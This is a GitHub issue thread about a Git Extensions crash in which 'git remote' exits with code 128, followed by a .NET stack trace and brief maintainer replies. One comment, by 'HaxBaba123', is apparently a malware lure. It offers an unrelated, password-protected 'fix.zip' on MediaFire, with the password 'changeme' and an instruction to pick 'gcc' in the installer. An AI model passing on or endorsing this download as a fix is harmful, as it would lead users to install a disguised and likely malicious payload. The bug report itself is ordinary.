### ISSUE TITLE
[NBug] External program returned non-zero exit code.

### ISSUE THREAD

**Issue by zeuslearning-suraj-balvanshi** [gitextensions/gitextensions#11856]
### Environment

- Git Extensions 4.2.1.17611
- Build b0c0b284876b63c52c77195ada82a85bfadbb083
- Git 2.46.0.windows.1
- Microsoft Windows NT 10.0.22631.0
- .NET 6.0.32
- DPI 96dpi (no scaling)
- Portable: False

### Issue description

Exit code: 128
Command: C:\Program Files\Git\bin\git.exe
Arguments: remote
Working directory: D:\git\WtW\WtW-BE-competition\

```
GitExtUtils.ExternalOperationException: External program returned non-zero exit code.
 ---> System.Exception: External program returned non-zero exit code.
   --- End of inner exception stack trace ---
   at GitCommands.ExecutableExtensions.ExecuteAsync(IExecutable executable, ArgumentString arguments, Action`1 writeInput, Encoding outputEncoding, CommandCache cache, Boolean stripAnsiEscapeCodes, Boolean throwOnErrorExit, CancellationToken cancellationToken) in C:\projects\gitextensions\GitCommands\Git\ExecutableExtensions.cs:line 332
   at Microsoft.VisualStudio.Threading.JoinableTask.CompleteOnCurrentThread()
   at Microsoft.VisualStudio.Threading.JoinableTask`1.CompleteOnCurrentThread()
   at Microsoft.VisualStudio.Threading.JoinableTaskFactory.Run[T](Func`1 asyncMethod, JoinableTaskCreationOptions creationOptions)
   at Microsoft.VisualStudio.Threading.JoinableTaskFactory.Run[T](Func`1 asyncMethod)
   at GitCommands.ExecutableExtensions.Execute(IExecutable executable, ArgumentString arguments, Action`1 writeInput, Encoding outputEncoding, CommandCache cache, Boolean stripAnsiEscapeCodes, Boolean throwOnErrorExit, CancellationToken cancellationToken) in C:\projects\gitextensions\GitCommands\Git\ExecutableExtensions.cs:line 264
   at GitCommands.GitModule.GetRemoteNames() in C:\projects\gitextensions\GitCommands\Git\GitModule.cs:line 2323
   at GitExtensions.Plugins.GitHub3.GitHub3Plugin.<>c__DisplayClass37_0.<<GetHostedRemotesForModule>g__Remotes|0>d.MoveNext() in C:\projects\gitextensions\Plugins\GitHub3\GitHub3Plugin.cs:line 235
   at System.Collections.Generic.List`1..ctor(IEnumerable`1 collection)
   at System.Linq.Enumerable.ToList[TSource](IEnumerable`1 source)
   at GitExtensions.Plugins.GitHub3.GitHub3Plugin.GetHostedRemotesForModule() in C:\projects\gitextensions\Plugins\GitHub3\GitHub3Plugin.cs:line 229
   at GitExtensions.Plugins.GitHub3.GitHub3Plugin.GitModuleIsRelevantToMe() in C:\projects\gitextensions\Plugins\GitHub3\GitHub3Plugin.cs:line 215
   at GitUI.PluginRegistry.<>c.<TryGetGitHosterForModule>b__11_0(IRepositoryHostPlugin gitHoster) in C:\projects\gitextensions\GitUI\Plugin\PluginRegistry.cs:line 59
   at System.Linq.Enumerable.TryGetFirst[TSource](IEnumerable`1 source, Func`2 predicate, Boolean& found)
   at System.Linq.Enumerable.FirstOrDefault[TSource](IEnumerable`1 source, Func`2 predicate)
   at GitUI.PluginRegistry.TryGetGitHosterForModule(GitModule module) in C:\projects\gitextensions\GitUI\Plugin\PluginRegistry.cs:line 59
   at GitUI.CommandsDialogs.RevisionDiffControl.RegisterGitHostingPluginInBlameControl() in C:\projects\gitextensions\GitUI\CommandsDialogs\RevisionDiffControl.cs:line 1458
   at GitUI.CommandsDialogs.FormBrowse.SetGitModule(Object sender, GitModuleEventArgs e) in C:\projects\gitextensions\GitUI\CommandsDialogs\FormBrowse.cs:line 1731
   at GitUI.CommandsDialogs.FormBrowse.OnLoad(EventArgs e) in C:\projects\gitextensions\GitUI\CommandsDialogs\FormBrowse.cs:line 486
   at System.Windows.Forms.Form.OnCreateControl()
   at System.Windows.Forms.Control.CreateControl(Boolean fIgnoreVisible)
   at System.Windows.Forms.Control.CreateControl()
   at System.Windows.Forms.Control.WmShowWindow(Message& m)
   at System.Windows.Forms.Control.WndProc(Message& m)
   at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
   at System.Windows.Forms.ContainerControl.WndProc(Message& m)
   at System.Windows.Forms.Form.WmShowWindow(Message& m)
   at System.Windows.Forms.Form.WndProc(Message& m)
   at ResourceManager.GitExtensionsFormBase.WndProc(Message& m) in C:\projects\gitextensions\ResourceManager\GitExtensionsFormBase.cs:line 106
   at GitUI.CommandsDialogs.FormBrowse.WndProc(Message& m) in C:\projects\gitextensions\GitUI\CommandsDialogs\FormBrowse.cs:line 571
   at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
   at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, WM msg, IntPtr wparam, IntPtr lparam)
```

get a blue screen

### Steps to reproduce

get a blue screen while committing code

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RussKie** [comment]
What do you mean by "get a blue screen"?

**Comment by mstv** [comment]
no response from author
